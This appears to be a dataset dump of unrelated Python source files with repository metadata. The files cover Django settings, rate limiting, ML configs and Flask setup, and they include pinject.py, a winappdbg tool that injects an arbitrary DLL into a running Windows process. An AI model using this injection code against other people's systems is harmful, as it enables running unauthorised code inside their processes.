output_value = Value(source_value.value)
min_interval = ensure_value(min_interval)
loop = loop or asyncio.get_event_loop()
# The last value to be received from the source
last_value = None
# Was last_value blocked from being sent due to the rate limit?
last_value_blocked = False
# The time (according to asyncio) the last blockage started. The
# blockage will be cleared min_interval.delay seconds after this
# time.
last_block_start = None
# The asyncio timer handle for the current blockage timer
timer_handle = None
# Is the rate limit currently being applied? (Initially yes for
# persistant values, otherwise no)
blocked = source_value.value is not NoValue
def clear_blockage():
"""Internal. Timeout expired callback."""
nonlocal blocked, last_value, last_value_blocked, last_block_start, timer_handle
if last_value_blocked:
# Pass the delayed value through
output_value._value = source_value.value
output_value.set_instantaneous_value(last_value)
last_value = None
last_value_blocked = False
# Start the blockage again
block()
else:
# No values queued up, just unblock
blocked = False
last_block_start = None
timer_handle = None
def block():
"""Setup a timer to unblock the rate_limit and output the last
value."""
nonlocal blocked, last_block_start, timer_handle
blocked = True
last_block_start = loop.time()
timer_handle = loop.call_at(
last_block_start + min_interval.value,
clear_blockage)
@source_value.on_value_changed
def on_source_value_changed(new_value):
nonlocal last_value, last_value_blocked
if not blocked:
# Pass the value change through
output_value._value = source_value.value
output_value.set_instantaneous_value(new_value)
# Start a timeout
block()
else:
# Keep the value back until we're unblocked
last_value = new_value
last_value_blocked = True
@min_interval.on_value_changed
def on_min_interval_changed(instantaneous_min_interval):
nonlocal timer_handle
now = loop.time()
if not blocked:
# No blockage in progress, nothing to do
pass
elif now - last_block_start >= min_interval.value:
# New timeout has already expired, unblock immediately
timer_handle.cancel()
clear_blockage()
else:
# Reset timer for new time
timer_handle.cancel()
timer_handle = loop.call_at(
last_block_start + min_interval.value,
clear_blockage)
if blocked:
block()
return output_value
| [
"mail@jhnet.co.uk"
] | mail@jhnet.co.uk |
44e1074a660ff7b36fd8603cd447819137ad3819 | ead9779110c2a0371ba3354b4bae4c5aa351424f | /project/project-template/project_name/woot/settings/staging.py | b6fed3aa53e84f0dc8406a81501e98ee93d19af0 | [] | no_license | NicholasPiano/django-skeleton-templates | 744ced68cd0efb3cf3b2c05cc447c25ffdbc2bfb | 3677ac05acd48fe14fc1292452b909c2ca7d4a85 | refs/heads/master | 2021-01-20T04:30:19.676492 | 2015-03-28T19:09:12 | 2015-03-28T19:09:12 | 25,471,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,710 | py | # {{project_name}}.settings.staging
# django
# local
from woot.settings.common import *
# util
from os import environ
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## DATABASE CONFIGURATION
DATABASE_USER = environ.get('DB_USER')
DATABASE_PWD = environ.get('DB_PWD')
# mysql: https://github.com/PyMySQL/mysqlclient-python
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2' for PG
'NAME': '',
'USER': '',
'PASSWORD': '',
'HOST': '', # Set to empty string for localhost.
'PORT': '', # Set to empty string for default.
}
}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '127.0.0.1:11211',
}
}
########## END CACHE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = '{{ secret_key }}'
########## END SECRET CONFIGURATION
########## TOOLBAR CONFIGURATION
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INSTALLED_APPS += (
'debug_toolbar',
)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INTERNAL_IPS = ('127.0.0.1',)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
DEBUG_TOOLBAR_CONFIG = {
}
########## END TOOLBAR CONFIGURATION
| [
"nicholas.d.piano@gmail.com"
] | nicholas.d.piano@gmail.com |
9033c26e3bd828fc81eef756c10dad8deec587df | 4cc22dad5cd0e05ea22f5aa1177e5a85fb6471ad | /gokart_pipeliner/pipeliner.py | efe905e6e831fd4237b6b801e771b0537b963537 | [
"MIT"
] | permissive | hirosassa/gokart-pipeliner | 2029544626bb17e207fdc3a19a238139a8c2617d | ec9aef9228e0de2363520974a266c069ddea0e37 | refs/heads/main | 2023-02-01T01:09:19.001282 | 2020-12-12T13:03:51 | 2020-12-12T13:03:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from typing import List
import luigi
import gokart
from gokart_pipeliner.instantiation_task import InstantiationTask
from gokart_pipeliner.enum import TYPING
from gokart_pipeliner.config_manager import ConfigManager
class GokartPipeliner:
def __init__(self,
params: TYPING.PARAMS = dict(),
config_path_list: TYPING.STR_LIST = list()):
self.config = ConfigManager(params, config_path_list)
def run(self,
tasks: List[luigi.task_register.Register],
params: TYPING.PARAMS = dict()):
params = self.config.make_running_params(params)
task = InstantiationTask.run(tasks, params=params)
luigi.build([task], local_scheduler=True)
def print_dependence_tree(self,
tasks: List[luigi.task_register.Register],
params: TYPING.PARAMS = dict()):
params = self.config.make_running_params(params)
task = InstantiationTask.run(tasks, params=params)
print("//-----[dependence_tree]------")
print(gokart.info.make_tree_info(task))
print("//----------------------------")
| [
"6syun9@gmail.com"
] | 6syun9@gmail.com |
e0b7ad7303a8e55c71905b535a4ea019af5c1c13 | 727a528cb2361ef7ea2043f66daa8dfc02f1d56e | /movies_project/movies/management/commands/remove_unused_movies.py | 2aa804936cdeb24280b884a72b9a80e6d94ec7c2 | [
"MIT"
] | permissive | TonyGu423/movies | a6e11fb7b4c1b2feb3bc928cace77b8f7ab6e79f | dbdb234119f88939ee485df69536bdbc091b8909 | refs/heads/master | 2021-01-16T20:43:36.121985 | 2015-10-26T12:24:00 | 2015-10-26T12:24:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | from movies.models import Movie
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Removes unused movies'
def handle(self, *args, **options):
for movie in Movie.objects.all():
if not movie.records.exists():
movie.delete()
print movie.title
| [
"desecho@gmail.com"
] | desecho@gmail.com |
9f91e065dafd1449d8ae3bcc61105cccd7df254c | c41f97ac62188860534da88e7c809036857b1876 | /02-Code.py | 967d6c25ccf9d511d4796b3bca591b409288a54a | [] | no_license | ravi4all/AdvPython_March | 210280594bc4651583fc22ef7a6d45deecbce2fc | b6385d7f19025cdb1f061046603c66fdcfebc57a | refs/heads/master | 2020-04-29T07:59:04.193110 | 2019-03-23T12:41:38 | 2019-03-23T12:41:38 | 175,970,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | class Student():
id = None
name = None
marks = None
standard = 8
data = []
def showStudent(self,id,name,marks):
self.data.append([id,name,marks,self.standard])
print(self.data)
s_1 = Student()
s_1.standard = 9
s_1.showStudent(101,'Ram',78.6)
s_2 = Student()
s_2.showStudent(102,'Raman',86.5)
| [
"noreply@github.com"
] | ravi4all.noreply@github.com |
490864555c3152ac58cf916babb377112092e85c | 116acf603f5db8d626247355bf786c339ba95ea9 | /apps/inforguide/handler.py | 3a910bddbbc0ec0c4702466cf035bc334848fd3f | [] | no_license | dahunuaa/ZhihuiSMB_python3 | 0857afeec2337b44571986a9c70c26e716142ccb | 8db2708efccd5eefa393738500e326bd7fb65c21 | refs/heads/master | 2021-01-25T14:32:32.201879 | 2018-03-11T05:59:10 | 2018-03-11T05:59:10 | 123,703,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | # -*- coding:utf-8 -*-
from ZhihuiSMB.apps.base.handler import MultiStandardHandler,SingleStandardHanler,TokenHandler
from ZhihuiSMB.libs.oauthlib import get_provider
from ZhihuiSMB.libs.loglib import get_logger
logger = get_logger("debug")
class InforguideListHandler(MultiStandardHandler,TokenHandler):
_model = "inforguide.InforguideModel"
enable_methods = ["post","get"]
private = False
class InforguideHandler(SingleStandardHanler,TokenHandler):
_model = "inforguide.InforguideModel"
enable_methods = ["get","put","delete"]
private = False
class InforguideClassifyHandler(MultiStandardHandler,TokenHandler):
_model = "inforguide.InforguideModel"
enable_methods = ["get"]
private = False
def get(self):
self.result["data"] = self.model.classify()
self.finish(self.result)
class InforguideUpdateHandler(MultiStandardHandler,TokenHandler):
_model = "inforguide.InforguideModel"
enable_methods = ["get"]
private = False
def _get(self):
self.model.update()
handlers = [
(r"",InforguideListHandler,get_provider("inforguide")),
(r"/classify",InforguideClassifyHandler,get_provider("inforguide")),
# (r"/update",InforguideUpdateHandler,get_provider("inforguide")),
(r"/(.*)",InforguideHandler,get_provider("inforguide"))
]
| [
"dahu yao"
] | dahu yao |
8544d26a3c301bbbd0ba99500ab5335cb78b23ce | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02382/s791282888.py | a561149827dff37dff5d772184eb82b93aeb25a2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | #! python 3
# distance_ii.py
import math
def minkovski(a, b, p):
if p == 'inf':
tmp_arr = [abs(x-y) for x, y in zip(a, b)]
max_val = tmp_arr[0]
for i in range(1, len(a)):
if max_val < tmp_arr[i]:
max_val = tmp_arr[i]
return max_val
else:
dst = 0
for x, y in zip(a, b):
dst += pow(abs(x-y), p)
dst = pow(dst, 1/p)
return dst
n = int(input())
a = [int(x) for x in input().split(' ')]
b = [int(x) for x in input().split(' ')]
for p in [1, 2, 3, 'inf']:
print('%.6f'%minkovski(a, b, p))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
abfea447ccb5dcc8cb7ef7aa9371f594739c1616 | 29f8b7f92eb22cc3134a16c439d3180e254df4bb | /chp12_flasktaskr_part05/project/__init__.py | d30a310dfbec437928b7a6cfbcc4ed4aac395547 | [] | no_license | Hemie143/realpython2 | 7df80dd5f61ce7cd8c31b8bf78111b8507cbdb36 | b8535ffe97594e1b18233bcd9aa0de664257cb09 | refs/heads/master | 2022-12-12T04:51:53.120131 | 2021-01-03T19:52:32 | 2021-01-03T19:52:32 | 208,735,855 | 0 | 0 | null | 2023-08-17T05:45:32 | 2019-09-16T07:22:16 | Python | UTF-8 | Python | false | false | 494 | py | # project/__init__.py
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config.from_pyfile('_config.py')
db = SQLAlchemy(app)
from chp12_flasktaskr_part05.project.users.views import users_blueprint
from chp12_flasktaskr_part05.project.tasks.views import tasks_blueprint
# from project.users.views import users_blueprint
# from project.tasks.views import tasks_blueprint
app.register_blueprint(users_blueprint)
app.register_blueprint(tasks_blueprint)
| [
"hemie143@gmail.com"
] | hemie143@gmail.com |
0928fa1442304f1c65bdf6a271a83d62dfef9e80 | dca0bd2e04dda3801d395c2a6ab2f9d95be79551 | /Python/SmallProject/three_stooges.py | 63eb8eccae942e5a7de0c7bd84bf4411c7b65899 | [] | no_license | A-khateeb/Full-Stack-Development-Path | ab8c86abea2f983fb8e0046a65b99772416c754c | 5a5eaa198367cc95a6b5638e9740f4ad564dec23 | refs/heads/master | 2021-06-01T23:52:04.965494 | 2020-05-01T22:59:20 | 2020-05-01T22:59:20 | 89,286,943 | 2 | 0 | null | 2017-12-22T22:21:52 | 2017-04-24T21:04:07 | Shell | UTF-8 | Python | false | false | 445 | py |
p = 'Hello world'
Stooges = ['Moe', 'Larry', 'Curly']
print (Stooges)
Stooges[2] = 'Shemp'
print (Stooges)
q= Stooges
q[2]= "!"
print (q)
print (Stooges)
Stooges.append('Shemp22')
print(Stooges)
print (len(['a',['b',["c"]]]))
print (len([0,1]))
print (len(["Udacity"]))
list1= [1,2]
list2 =[3,4]
list1.append(list2)
print (len(list1))
list2[1] = 5
print (list1)
'''
spy= [0,0,7]
agent = spy
spy[2]= agent[2]+1
print (spy)
print (agent)
'''
| [
"khateebafeef@gmail.com"
] | khateebafeef@gmail.com |
9902394669267c37d5bd08bb34edc9919258b642 | 48e6a442f35cace8df3a87e1660e4539a084b39e | /cluster_2/90_10/A1_pod100/traffic_matrix_1/A1_1.py | ff9e5eb1a6848b9195753f8fd17b0ca8dfe69ad7 | [] | no_license | LiYan1988/kthjocn | 9056c05e5095a93b47a22c9e027458f410c0d8f3 | 7e5de3b3fb2a48c6dcaf6d7788ab823c5c743845 | refs/heads/master | 2021-01-01T03:56:47.251908 | 2018-06-08T07:27:33 | 2018-06-08T07:27:33 | 77,261,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,740 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 4 15:15:10 2016
@author: li
optimize both throughput and connections
"""
#import sys
#sys.path.insert(0, '/home/li/Dropbox/KTH/numerical_analysis/ILPs')
from sdm import *
from gurobipy import *
import pandas as pd
np.random.seed(2010)
num_cores=5
num_slots=80
mtridx = 1
time_limit_routing = 1800 # 1000
time_limit_sa = 108 # 10800
filename = 'traffic_matrix_1.csv'
# print filename
tm = []
with open(filename) as f:
reader = csv.reader(f)
for idx, row in enumerate(reader):
row = [float(u) for u in row]
tm.append(row)
tm = np.array(tm)
betav = np.array([0,
1e-5, 2e-5, 4e-5, 8e-5,
1e-4, 2e-4, 4e-4, 8e-4,
1e-3, 2e-3, 4e-3, 8e-3,
1e-2, 2e-2, 4e-2, 8e-2,
1e-1, 2e-1, 4e-1, 1, 10])
#betav = np.array([1e-3, 2e-3, 4e-3, 8e-3])
results = {}
obj_results = {}
cnk_results = {}
thp_results = {}
obj_ub = {}
cnk_ub = {}
thp_ub = {}
for beta in betav:
m = Arch1_decompose(tm, num_slots=num_slots, num_cores=num_cores,
alpha=1,beta=beta)
m.create_model_routing(mipfocus=1,timelimit=time_limit_routing,mipgap=0.05, method=2)
m.multiple_heuristic()
results[beta] = pd.DataFrame(m.heuristics_results)
obj_results[beta] = results[beta].iloc[0, :]
cnk_results[beta] = results[beta].iloc[1, :]
thp_results[beta] = results[beta].iloc[2, :]
obj_ub[beta] = m.obj_ub_
cnk_ub[beta] = m.connection_ub_
thp_ub[beta] = m.throughput_ub_
# write results
m.write_result_csv('cnklist_heuristic_%d_%.2e.csv'%(mtridx,beta), m.cnklist_)
obj_results = pd.DataFrame(obj_results)
cnk_results = pd.DataFrame(cnk_results)
thp_results = pd.DataFrame(thp_results)
obj_ub = pd.Series(obj_ub)
cnk_ub = pd.Series(cnk_ub)
thp_ub = pd.Series(thp_ub)
argmax = {betav[i]:obj_results.iloc[:, i].argmax() for i in range(len(betav))}
objmax = {betav[i]:obj_results.iloc[:, i].max() for i in range(len(betav))}
cnk_bh = {betav[i]:cnk_results.loc[argmax[betav[i]], betav[i]]
for i in range(len(betav))}
thp_bh = {betav[i]:thp_results.loc[argmax[betav[i]], betav[i]]
for i in range(len(betav))}
obj_final = pd.DataFrame({'ub':obj_ub, 'best_heuristic':objmax,
'best_method':argmax, 'cnk_bh':cnk_bh,
'thp_bh':thp_bh, 'cnk_ub':cnk_ub, 'thp_ub':thp_ub})
obj_final['optimality'] = obj_final['best_heuristic']/obj_final['ub']
obj_results.to_csv('obj_results_{}.csv'.format(mtridx))
cnk_results.to_csv('cnk_results_{}.csv'.format(mtridx))
thp_results.to_csv('thp_results_{}.csv'.format(mtridx))
obj_final.to_csv('obj_final_{}.csv'.format(mtridx)) | [
"li.yan.ly414@gmail.com"
] | li.yan.ly414@gmail.com |
fe051cda5eea45aaa1903b017a8c2a6d1ee5e14c | d5ee6e6bd1df32a123558e6e4a79c3ad17db19bc | /news/managers.py | 0c53ab2888fd1d4280c4654b067893967f34b36b | [] | no_license | trailhawks/lawrencetrailhawks.com | 06d9f3f0753f0529718a14540858637b5bdfae3d | b250c131cd655e9b43b27834db702e3a853df88b | refs/heads/master | 2021-06-10T11:22:20.435575 | 2016-12-23T08:58:08 | 2016-12-23T08:58:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | import datetime
from django.db.models import Manager
from django.db.models.query import QuerySet
from django.utils import timezone
class NewsQuerySet(QuerySet):
def draft(self):
return self.filter(status__exact=self.model.STATUS_DRAFT)
def public(self):
return self.filter(status__exact=self.model.STATUS_PUBLIC)
def recent(self):
recently = timezone.now() - datetime.timedelta(days=14)
return self.filter(pub_date__gte=recently)
class NewsManager(Manager):
def get_queryset(self):
return NewsQuerySet(self.model, using=self._db)
def draft(self):
return self.get_queryset().draft()
def public(self):
return self.get_queryset().public()
def recent(self):
return self.get_queryset().recent()
| [
"jeff.triplett@gmail.com"
] | jeff.triplett@gmail.com |
0e4a2e05b6a37082a2b8121508a8530e3042edee | 0be484378e45f67a8ab7675498cbc80b51df8461 | /bt5/erp5_ui_test_core/SkinTemplateItem/portal_skins/erp5_ui_test_core/Zuite_setPreference.py | 1eb1be5e08970ec882a4fcc3af5d6feaed8d8519 | [] | no_license | uhml/erp5 | 7ba69b43d0f6c36e4e1b1116351788e75135889d | 41bae8338b238267d60e57a7c7aaa91b32ee0826 | refs/heads/master | 2021-01-14T13:21:27.340016 | 2016-08-18T10:10:56 | 2016-08-18T11:12:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | """Set subversion working copy list and enable preference.
This script is called by Products.ERP5Type.tests.runFunctionalTest to set
subversion working copy paths and conversion server address.
It's not meant to be called by zelenium tests directly.
"""
pref = getattr(context.portal_preferences, "erp5_ui_test_preference", None)
if pref is None:
pref = context.portal_preferences.newContent(id="erp5_ui_test_preference",
portal_type="Preference",
priority=1)
pref.setPreferredSubversionWorkingCopyList(tuple(working_copy_list.split(',')))
pref.setPreferredHtmlStyleUnsavedFormWarning(False)
if pref.getPreferenceState() == 'disabled':
pref.enable()
pref = getattr(context.portal_preferences, "erp5_ui_test_system_preference", None)
if pref is None:
pref = context.portal_preferences.newContent(id="erp5_ui_test_system_preference",
portal_type="System Preference",
priority=1)
pref.setPreferredOoodocServerAddress(conversion_server_hostname)
pref.setPreferredOoodocServerPortNumber(conversion_server_port)
if pref.getPreferenceState() == 'disabled':
pref.enable()
return 'Set Preference Successfully.'
| [
"georgios.dagkakis@nexedi.com"
] | georgios.dagkakis@nexedi.com |
1460e4adc0eaf45d2f00362cbf7115fb97d33bd3 | 507b4ffbdc19614603da9c5c6ea31910fdbbf288 | /interface/labeler_client.py | c5c2eab0889b1d1660528d177857cd573207b2fd | [
"Apache-2.0"
] | permissive | jerryli27/TwinGANFrontendTemporary | 755a0e39f6f92522687cd1bd916549acd2295fd0 | 24f9327d1c50f7b54198a8d74073ca7507d715fb | refs/heads/master | 2020-03-14T12:22:12.950810 | 2018-04-30T15:14:14 | 2018-04-30T15:14:14 | 131,610,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,788 | py | import os
import util_io
import util_misc
import interface_utils
class LabelerClient(object):
def __init__(self,):
self.image_paths = []
self.sketch_paths = []
self.index = 0
self.done_image_paths = set()
self.done_image_txt_path = ''
self.sketch_folder = ''
def set_image_paths(self, image_path, finished_image_txt_path, sketch_folder, exclude_file_start={'e', 'q'}):
if image_path:
self.image_paths = util_io.get_all_image_paths(image_path)
# Danbooru specific method to filter out nsfw images.
self.image_paths = [p for p in self.image_paths if os.path.basename(p)[0] not in exclude_file_start]
self.sketch_paths = [None for _ in range(len(self.image_paths))]
self.index = 0
if finished_image_txt_path:
self.done_image_txt_path = finished_image_txt_path
dir = os.path.dirname(finished_image_txt_path)
self.colored_sketch_pair_txt_path = os.path.join(dir, 'colored_sketch_pair.txt')
util_io.touch_folder(dir)
try:
self.done_image_paths = set(util_io.get_all_image_paths(finished_image_txt_path))
except AssertionError:
pass
self.sketch_folder = sketch_folder
sketches = set([util_misc.get_no_ext_base(p) for p in util_io.get_all_image_paths(sketch_folder)])
self.image_paths = [p for p in self.image_paths if util_misc.get_no_ext_base(p) in sketches]
pass
def get_image_and_id(self):
"""Returns an image encoded in base64."""
while self.index < len(self.image_paths) and self.image_paths[self.index] in self.done_image_paths:
self.index += 1
if self.index == len(self.image_paths):
return None, None, None
image = interface_utils.get_image_encoding(self.image_paths[self.index])
image_id = os.path.basename(self.image_paths[self.index])
sketch_image_path = self.get_current_sketch_path()
sketch = interface_utils.get_image_encoding(sketch_image_path)
self.sketch_paths[self.index] = sketch_image_path
return image, sketch, image_id
def mark_current_as_done(self, is_skip):
with open(self.done_image_txt_path, 'a') as f:
f.write(self.image_paths[self.index] + '\n')
if not is_skip:
with open(self.colored_sketch_pair_txt_path, 'a') as f:
f.write(self.image_paths[self.index]+'\t' + self.sketch_paths[self.index] + '\n')
self.done_image_paths.add(self.image_paths[self.index])
self.index += 1
def get_current_sketch_path(self):
return self.get_sketch_path_for_image_name(self.image_paths[self.index])
def get_sketch_path_for_image_name(self, image_basename):
return os.path.join(self.sketch_folder, util_misc.get_no_ext_base(image_basename) + '.jpg')
def set_current_sketch_path(self, new_path):
self.sketch_paths[self.index] = new_path | [
"jerrylijiaming@gmail.com"
] | jerrylijiaming@gmail.com |
7908f51adf44b6200b10a9cc53f37fa511f66531 | f6439b5ed1614fd8db05fa963b47765eae225eb5 | /chrome/browser/extensions/api/push_messaging/DEPS | 8c7d15a911d33d64d98ca56406d3c0a18c5d4e0f | [
"BSD-3-Clause"
] | permissive | aranajhonny/chromium | b8a3c975211e1ea2f15b83647b4d8eb45252f1be | caf5bcb822f79b8997720e589334266551a50a13 | refs/heads/master | 2021-05-11T00:20:34.020261 | 2018-01-21T03:31:45 | 2018-01-21T03:31:45 | 118,301,142 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | include_rules = [
"+components/invalidation",
"+google/cacheinvalidation/types.pb.h",
"+sync/internal_api/public/base/invalidation.h",
"+sync/internal_api/public/base/invalidation_util.h",
]
| [
"jhonnyjosearana@gmail.com"
] | jhonnyjosearana@gmail.com | |
68095f0f7e56c2373879c98c67cf6bbf375b3bf3 | 40dd8330e5f78c4348bbddc2c5acfd59d793dd51 | /projects/medical/2d_image/dermoscopy/isic2017_task1/configs/fcn-unet-s5-d16_unet_1xb16-0.0001-20k_isic2017-task1-512x512.py | 58d0a125d33a1948802b1bbc104095f9fdd28f54 | [
"Apache-2.0"
] | permissive | open-mmlab/mmsegmentation | 0d12092312e2c465ede1fd7dd9847b6f2b37049c | 30a3f94f3e2916e27fa38c67cc3b8c69c1893fe8 | refs/heads/main | 2023-09-04T10:54:52.299711 | 2023-07-24T07:28:21 | 2023-07-24T07:28:21 | 272,133,018 | 6,534 | 2,375 | Apache-2.0 | 2023-09-14T01:22:32 | 2020-06-14T04:32:33 | Python | UTF-8 | Python | false | false | 606 | py | _base_ = [
'mmseg::_base_/models/fcn_unet_s5-d16.py', './isic2017-task1_512x512.py',
'mmseg::_base_/default_runtime.py',
'mmseg::_base_/schedules/schedule_20k.py'
]
custom_imports = dict(imports='datasets.isic2017-task1_dataset')
img_scale = (512, 512)
data_preprocessor = dict(size=img_scale)
optimizer = dict(lr=0.0001)
optim_wrapper = dict(optimizer=optimizer)
model = dict(
data_preprocessor=data_preprocessor,
decode_head=dict(num_classes=2),
auxiliary_head=None,
test_cfg=dict(mode='whole', _delete_=True))
vis_backends = None
visualizer = dict(vis_backends=vis_backends)
| [
"noreply@github.com"
] | open-mmlab.noreply@github.com |
1cc43dc39860b3db828c76db2404cf44159f7da6 | 08ace4e8d7b2fcfa4ff4983e643873fd9c01f6de | /tools/pinject.py | ef71dd321b6524c40bc31b51194ec46cd83e3890 | [] | no_license | 0x90/winappdbg | 87d2e769707ec4ca482af0c946e02f77976314a2 | 5acffe77379836622042385460411ef4dc751d46 | refs/heads/master | 2020-09-26T08:19:10.600353 | 2019-12-06T00:42:52 | 2019-12-06T00:42:52 | 226,215,022 | 6 | 1 | null | 2019-12-06T00:41:16 | 2019-12-06T00:41:15 | null | UTF-8 | Python | false | false | 3,301 | py | #!/bin/env python
# -*- coding: utf-8 -*-
# Acknowledgements:
# Nicolas Economou, for his ptool suite on which this tool is inspired.
# http://tinyurl.com/nicolaseconomou
# Process DLL injector
# Copyright (c) 2009-2018, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
from winappdbg import Process, System, HexInput
def main():
print "Process DLL injector"
print "by Mario Vilas (mvilas at gmail.com)"
print
if len(sys.argv) != 3:
script = os.path.basename(sys.argv[0])
print "Injects a DLL into a running process."
print " %s <pid> <library.dll>" % script
print " %s <process.exe> <library.dll>" % script
return
System.request_debug_privileges()
try:
pid = HexInput.integer(sys.argv[1])
except Exception:
s = System()
s.scan_processes()
pl = s.find_processes_by_filename(sys.argv[1])
if not pl:
print "Process not found: %s" % sys.argv[1]
return
if len(pl) > 1:
print "Multiple processes found for %s" % sys.argv[1]
for p,n in pl:
print "\t%12d: %s" % (p,n)
return
pid = pl[0][0].get_pid()
print "Using PID %d (0x%x)" % (pid, pid)
dll = sys.argv[2]
print "Using DLL %s" % dll
p = Process(pid)
b = p.get_bits()
if b != System.bits:
print (
"Cannot inject into a %d bit process from a %d bit Python VM!"
% (b, System.bits)
)
return
p.scan_modules()
p.inject_dll(dll)
if __name__ == '__main__':
try:
import psyco
psyco.bind(main)
except ImportError:
pass
main()
| [
"mvilas@gmail.com"
] | mvilas@gmail.com |
b634f92f48233fa93f99b45521e9ff384f0ae8cf | abaa004b41f63aa489be12a6e4be8f92ef2ef6d3 | /csvfetch/csvfetch/asgi.py | 10359ee6cee1be3538ccdfe026ad2c360aa606c2 | [] | no_license | vshaladhav97/django_practise_projects | 30dcc8dd909626c1d624d9c5895fc90ad55c79d0 | 83455c50e2ee910f03db47fbe1420d1cbd7eb292 | refs/heads/master | 2023-03-28T14:08:08.244694 | 2021-03-26T03:56:56 | 2021-03-26T03:56:56 | 351,655,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | """
ASGI config for csvfetch project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'csvfetch.settings')
application = get_asgi_application()
| [
"adhavv0@gmail.com"
] | adhavv0@gmail.com |
a585f7468c544e99b02615287e02c85f662132d5 | a56a74b362b9263289aad96098bd0f7d798570a2 | /venv/lib/python3.8/site-packages/mpl_toolkits/axisartist/grid_helper_curvelinear.py | 93336b8d648bea6ead4190aa02ed7fd51c938de7 | [
"MIT"
] | permissive | yoonkt200/ml-theory-python | 5812d06841d30e1068f6592b5730a40e87801313 | 7643136230fd4f291b6e3dbf9fa562c3737901a2 | refs/heads/master | 2022-12-21T14:53:21.624453 | 2021-02-02T09:33:07 | 2021-02-02T09:33:07 | 132,319,537 | 13 | 14 | MIT | 2022-12-19T17:23:57 | 2018-05-06T08:17:45 | Python | UTF-8 | Python | false | false | 14,384 | py | """
An experimental support for curvilinear grid.
"""
from itertools import chain
import numpy as np
from matplotlib.path import Path
from matplotlib.transforms import Affine2D, IdentityTransform
from .axislines import AxisArtistHelper, GridHelperBase
from .axis_artist import AxisArtist
from .grid_finder import GridFinder, _deprecate_factor_none
class FixedAxisArtistHelper(AxisArtistHelper.Fixed):
"""
Helper class for a fixed axis.
"""
def __init__(self, grid_helper, side, nth_coord_ticks=None):
"""
nth_coord = along which coordinate value varies.
nth_coord = 0 -> x axis, nth_coord = 1 -> y axis
"""
super().__init__(loc=side)
self.grid_helper = grid_helper
if nth_coord_ticks is None:
nth_coord_ticks = self.nth_coord
self.nth_coord_ticks = nth_coord_ticks
self.side = side
self._limits_inverted = False
def update_lim(self, axes):
self.grid_helper.update_lim(axes)
if self.nth_coord == 0:
xy1, xy2 = axes.get_ylim()
else:
xy1, xy2 = axes.get_xlim()
if xy1 > xy2:
self._limits_inverted = True
else:
self._limits_inverted = False
def change_tick_coord(self, coord_number=None):
if coord_number is None:
self.nth_coord_ticks = 1 - self.nth_coord_ticks
